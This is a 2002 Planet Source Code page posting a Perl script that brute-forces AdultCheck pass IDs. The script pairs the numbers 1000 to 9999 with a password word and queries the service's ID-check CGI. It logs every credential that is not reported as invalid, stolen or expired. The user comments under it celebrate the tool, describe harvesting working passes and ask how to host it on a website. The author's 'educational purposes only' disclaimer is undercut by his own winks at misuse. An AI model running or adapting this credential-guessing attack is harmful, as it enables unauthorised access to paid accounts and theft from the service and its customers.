Quick Search for:  in language:    
cracks,adult,check,passesJust,change,firebird
   Code/Articles » |  Newest/Best » |  Community » |  Jobs » |  Other » |  Goto » | 
CategoriesSearch Newest CodeCoding ContestCode of the DayAsk A ProJobsUpload
Perl Stats

 Code: 75,331. lines
 Jobs: 26. postings

 How to support the site

 
Sponsored by:

 
You are in:
 
Login





Latest Code Ticker for Perl.
Message Sender
By sp on 1/15


Click here to see a screenshot of this code!Mailing List v2.0
By Aaron L. Anderson on 1/7

(Screen Shot)

ShowIMG
By Jeff Mills on 1/5


Click here to put this ticker on your site!


Add this ticker to your desktop!


Daily Code Email
To join the 'Code of the Day' Mailing List click here!

Affiliate Sites



 
 
   

Adult Check Catcher....

Print
Email
 
VB icon
Submitted on: 8/22/2002 12:22:31 PM
By: iron saTan  
Level: Beginner
User Rating: By 11 Users
Compatibility:5.0 (all versions), Active Perl specific, 4.0 (all versions), 3.0 (all versions), Pre 3.0

Users have accessed this code 4027 times.
 
 
     This cracks adult check passes. Just change firebird to get more it would be better if you make sure there are passes with that word. This is just for educational purposes only!
 
code:
Can't Copy and Paste this?
Click here for a copy-and-paste friendly version of this code!
 
Terms of Agreement:   
By using this code, you agree to the following terms...   
1) You may use this code in your own programs (and may compile it into a program and distribute it in compiled format for languages that allow it) freely and with no charge.   
2) You MAY NOT redistribute this code (for example to a web site) without written permission from the original author. Failure to do so is a violation of copyright laws.   
3) You may link to this code from another website, but ONLY if it is not wrapped in a frame. 
4) You will abide by any additional copyright restrictions which the author may have placed in the code or code's description.

    =**************************************
    = Name: Adult Check Catcher....
    = Description:This cracks adult check pa
    =     sses.
    Just change firebird to get more it would be better if you make sure there are passes with that word.
    This is just for educational purposes only!
    = By: iron saTan
    =
    =This code is copyrighted and has    = limited warranties.Please see http://w
    =     ww.Planet-Source-Code.com/vb/scripts/Sho
    =     wCode.asp?txtCodeId=359&lngWId;=6    =for details.    =**************************************
    
    #!usr\bin\perl
    ####################################
    ## AdultCheck Catcher ##
    ## Copyright iron saTan (C)##
    ## ironsatan@satanshideaway.com##
    ####################################
    use IO::Socket;
    print "Scanning for Adult Check Catcher!\n";
    print "By iron saTan(ironsatan@satanshideaway.com\n\n\n";
    for ($i = 1000; $i < 9999; $i++){
    $id = $i;
    $id .= "firebird";# Change the word for more passes
    # Gets info from server
    if ($look = IO::Socket::INET->new(PeerAddr => 'id.adultcheck.com', PeerPort => '80', Proto => "tcp")) {
    print $look "GET /cgi-bin/idsearch.cgi?page=649943&id;=$id HTTP/1.0\n\n";
    }
    while ($ex_data = <$look>) {
    chop($ex_data);
    $bitch .= $ex_data;
    }
    $a = "http://www4.adultcheck.com/cgi-bin/invalid.shtml";
    $b = "http://www4.adultcheck.com/cgi-bin/stolen.shtml";
    $c = "http://www4.adultcheck.com/cgi-bin/expired.shtml";
    open (FOUND,">>c:/adultchecks.txt") or die "Can't open log file";
    # Sees if id is valid or invaild or stolen or expired
    if ($bitch =~ /\Q$a\E/i) {
    print "\n$id Not found";
    }
    else
    {
    if ($bitch =~ /\Q$b\E/i){
    print "\n$id has been stolen";
    }
    else
    {
    if ($bitch =~ /\Q$c\E/i){
    print "\n$id has expired";
    }
    else
    {
    print "\n$id FOUND!!!!";
    print FOUND "\n$id";
    }
    }
    }
    $bitch = "";
    }
    print "\nEnd of Scan!";


Other 1 submission(s) by this author

 

 
Report Bad Submission
Use this form to notify us if this entry should be deleted (i.e contains no code, is a virus, etc.).
Reason:
 
Your Vote!

What do you think of this code(in the Beginner category)?
(The code with your highest vote will win this month's coding contest!)
Excellent  Good  Average  Below Average  Poor See Voting Log
 
Other User Comments
8/22/2002 12:25:37 PM:TonikGin
i love you for this
Keep the Planet clean! If this comment was disrespectful, please report it:
Reason:

 
8/22/2002 12:30:04 PM:foney
hehe
Keep the Planet clean! If this comment was disrespectful, please report it:
Reason:

 
8/22/2002 4:11:05 PM:birdprog
can someone mail me a link on their 
page? its not working for me i set of 
the permissions and changed the 
extensions to .pl and .cgi and still 
nothing.
Keep the Planet clean! If this comment was disrespectful, please report it:
Reason:

 
8/22/2002 4:23:00 PM:iron saTan
You have to download active perl from 
http://www.activestate.com this isn't a 
web script its a perl program, I may 
turn it into a cgi script :)
Keep the Planet clean! If this comment was disrespectful, please report it:
Reason:

 
8/22/2002 5:35:49 PM:Dustin R Davis
Ok, i made me a VB version of this 
program...might do C++ too, but what 
exactly is the point? I mean, so you 
found the word firebird next to 
3974...what can you do with this info? 
Is the ID=3974 and Pass=firebird?
Keep the Planet clean! If this comment was disrespectful, please report it:
Reason:

 
8/22/2002 6:21:51 PM:iron saTan
Umm this is for eductaion purposes 
only, I can only say do nothing 
*cough*You gotta make sure it 
works?*cough*
Keep the Planet clean! If this comment was disrespectful, please report it:
Reason:

 
8/22/2002 6:47:48 PM:Dustin R Davis
LMFAO! N/M I figured it out, when i get 
a good one...err...i find one, it gives 
me th einfo i need. Thanks. Very 
educational ;-) wink wink If you dont 
mind i would like to post my VB version 
of this program on PSC. I will give u 
credit of course, e-mail me
Keep the Planet clean! If this comment was disrespectful, please report it:
Reason:

 
8/23/2002 7:02:26 PM:Yoan
It roxx0rs. Good work, as usual.
Keep the Planet clean! If this comment was disrespectful, please report it:
Reason:

 
8/25/2002 2:15:45 PM:unknown
Very nice code.  Great work.  :)
Keep the Planet clean! If this comment was disrespectful, please report it:
Reason:

 
8/26/2002 2:52:52 AM:Mr. Anon
How to convert this program into a 
cgi?
I'm on 56k and this is SLOW.
I'd 
like to run it from my website.
Thanks
Keep the Planet clean! If this comment was disrespectful, please report it:
Reason:

 
8/26/2002 3:31:07 PM:Robert Wolfe
Mr.Anon - rename it to .cgi, make it 
executable.. and call it form your 
website usign a button or form (enter 
string to check in textbox maybe?). 
Make sure u have program post the 
results into a text file on the server, 
and open it after it's done. =D
Keep the Planet clean! If this comment was disrespectful, please report it:
Reason:

 
8/27/2002 6:03:25 PM:Jason Myerscough
you dont have to call it a .cgi ti turn 
it in to a cgi script. you can still 
run it if it was a .pl file :)
Keep the Planet clean! If this comment was disrespectful, please report it:
Reason:

 
8/30/2002 12:42:03 PM:James
Dude man you rock!
Keep the Planet clean! If this comment was disrespectful, please report it:
Reason:

 
9/2/2002 1:18:44 AM:
Hey, I got a question.  Why is it that 
'firebird' is such as popular 
password???  Not even 'password' yields 
as many results!
Keep the Planet clean! If this comment was disrespectful, please report it:
Reason:

 
9/6/2002 11:18:55 AM:iron saTan
Adult check choses the word, so the 
passwds that has alot of passwds are 
the ones adult check are currently 
using...
Keep the Planet clean! If this comment was disrespectful, please report it:
Reason:

 
Add Your Feedback!
Note:Not only will your feedback be posted, but an email will be sent to the code's author in your name.

NOTICE: The author of this code has been kind enough to share it with you.  If you have a criticism, please state it politely or it will be deleted.

For feedback not related to this particular code, please click here.
 
Name:
Comment:

 

Categories | Articles and Tutorials | Advanced Search | Recommended Reading | Upload | Newest Code | Code of the Month | Code of the Day | All Time Hall of Fame | Coding Contest | Search for a job | Post a Job | Ask a Pro Discussion Forum | Live Chat | Feedback | Customize | Perl Home | Site Home | Other Sites | About the Site | Feedback | Link to the Site | Awards | Advertising | Privacy

Copyright© 1997 by Exhedra Solutions, Inc. All Rights Reserved.  By using this site you agree to its Terms and Conditions.  Planet Source Code (tm) and the phrase "Dream It. Code It" (tm) are trademarks of Exhedra Solutions, Inc.